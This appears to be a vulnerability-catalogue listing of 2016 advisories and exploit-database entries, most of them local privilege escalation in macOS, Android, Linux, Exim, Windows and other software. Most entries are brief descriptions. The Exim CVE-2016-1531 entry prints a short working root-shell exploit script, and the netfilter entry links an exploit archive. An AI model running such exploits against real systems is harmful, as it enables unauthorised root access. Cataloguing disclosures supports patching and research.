CVE-2016-4709
CVE-2016-4709 is a local privilege-escalation vulnerability in WindowServer on Apple OS X/macOS prior to 10.12. The root cause is a type-confusion issue in CoreGraphics handling that allows a local attacker to obtain root privileges. Connected advisories (ZDI-16-608/16-609) describe the same Wind...
Android operating system vulnerability that allows an attacker to escalate privileges
A vulnerability in the drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c component of Qualcomm’s Android operating system is related to deficiencies in access control. Exploiting this vulnerability could allow an attacker, operating locally, to escalate their privileges through an...
7-Zip Local Code Execution Vulnerability
7-Zip is a free, open source compression/decompression software. A local code execution vulnerability exists in 7-Zip, which can be exploited by a local attacker to execute arbitrary code in an affected application, possibly also resulting in a denial of service...
KLA10848 Multiple vulnerabilities in Oracle VM VirtualBox
Unspecified vulnerabilities were found in Oracle VM VirtualBox. By exploiting these vulnerabilities malicious users can cause denial of service or obtain sensitive information. These vulnerabilities can be exploited remotely or locally. Original advisories Oracle bulletin Related products...
Debian/Ubuntu Exim local privilege escalation vulnerability
No description provided by source...
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation
/ EDB Note: Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip Video https://www.youtube.com/watch?v=qchiJn94kTo / / decr.c / / Ubuntu 16.04 local root exploit - netfilter target_offset OOB check_compat_entry_size_and_hooks/check_entry Tested on...
DEBIAN-CVE-2016-1237
nfsd in the Linux kernel through 4.6.3 allows local users to bypass intended file-permission restrictions by setting a POSIX ACL, related to nfs2acl.c, nfs3acl.c, and nfs4acl.c...
Cisco Unified IP Phones Local Privilege Escalation Vulnerability
No description provided by source...
Android Qualcomm Video Driver Local Elevation of Privilege Vulnerability
Android is a Linux-based open source operating system developed by Google and the Open Handheld Alliance OHA, and Qualcomm Video Driver is a video driver developed by Qualcomm. An elevation of privilege vulnerability exists in the Qualcomm Video Driver for Android. A local attacker could exploit...
KLA10813 Privilege escalation vulnerability in Apple iTunes
An unspecified vulnerability was found in Apple iTunes setup. By exploiting this vulnerability malicious users can gain privileges. This vulnerability can be exploited locally via a DLL hijack. Original advisories Apple advisory Related products Apple-iTunes CVE list CVE-2016-1742 high Solution...
KLA10814 Privilege escalation vulnerability in VMware Player and Workstation
An improper file access was found in VMware products. By exploiting this vulnerability malicious users can gain privileges. This vulnerability can be exploited locally. Original advisories VMware advisory Related products VMware-Workstation VMware-Player CVE list CVE-2016-2077 critical Solution...
Microsoft Windows Win32k Elevation of Privilege Vulnerability (CNVD-2016-03105)
Microsoft Windows is a series of operating systems released by Microsoft USA. win32k.sys is the kernel part of the Windows subsystem, a kernel-mode device driver, which contains a window manager, background control windows and screen output management. An elevation of privilege vulnerability exis...
CVE-2016-0774
CVE-2016-0774 affects Linux kernel backports in Debian wheezy (before 3.2.73-2+deb7u3) and RHEL 7.1 (before 3.10.0-229.26.2). The flaw is in the pipe_read/pipe_write paths in fs/pipe.c where the side effects of failed __copy_to_user_inatomic/__copy_from_user_inatomic calls are not properly handle...
Linux kernel SET_WPS_IE IOCTL component stack buffer overflow vulnerability
The Linux kernel is the kernel used by the operating system Linux, released by the Linux Foundation in the United States. A stack buffer overflow vulnerability exists in the SET_WPS_IE IOCTL component of the Linux kernel. A local attacker could exploit this vulnerability to affect confidentiality,...
SAP NetWeaver AS ABAP - Directory traversal using READ DATASET
Application: SAP NetWeaver AS ABAP Versions Affected: SAP NetWeaver AS ABAP 7.4 Vendor URL: SAP Bugs: Directory traversal Reported: 22.04.2016 Vendor response: 23.04.2016 Date of Public Advisory: 09.08.2016 Reference: SAP Security Note 2312966 Author: Daria Prosochkina ERPScan VULNERABILITY...
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
Exploit for freebsd platform in category dos / poc / 1. Advisory Information Title: FreeBSD Kernel amd64_set_ldt Heap Overflow Advisory ID: CORE-2016-0005 Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-amd64setldt-heap-overflow Date published: 2016-03-16 Date of last update:...
Exim 4.84-3 - Local Privilege Escalation
!/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...
Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)
Microsoft Windows - Kerberos Security Feature Bypass MS16-014 Exploit Title: Windows Kerberos Security Feature Bypass Date: 12-02-2016 Exploit Author: Nabeel Ahmed Tested on: Windows 7 Professional x32/x64 CVE : CVE-2016-0049 Category: Local Exploit 1 Prerequisites: - Standard Windows 7 Fully...
Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)
Exploit for windows platform in category local exploits Exploit Title: Windows Kerberos Security Feature Bypass Date: 12-02-2016 Exploit Author: Nabeel Ahmed Tested on: Windows 7 Professional x32/x64 CVE : CVE-2016-0049 Category: Local Exploit 1 Prerequisites: - Standard Windows 7 Fully patched a...
yTree 1.94-1.1 - Local Buffer Overflow
Exploit for linux platform in category dos / poc Description: yTree is prone to a stack-based overflow; an attacker could exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. Tested and developed on:...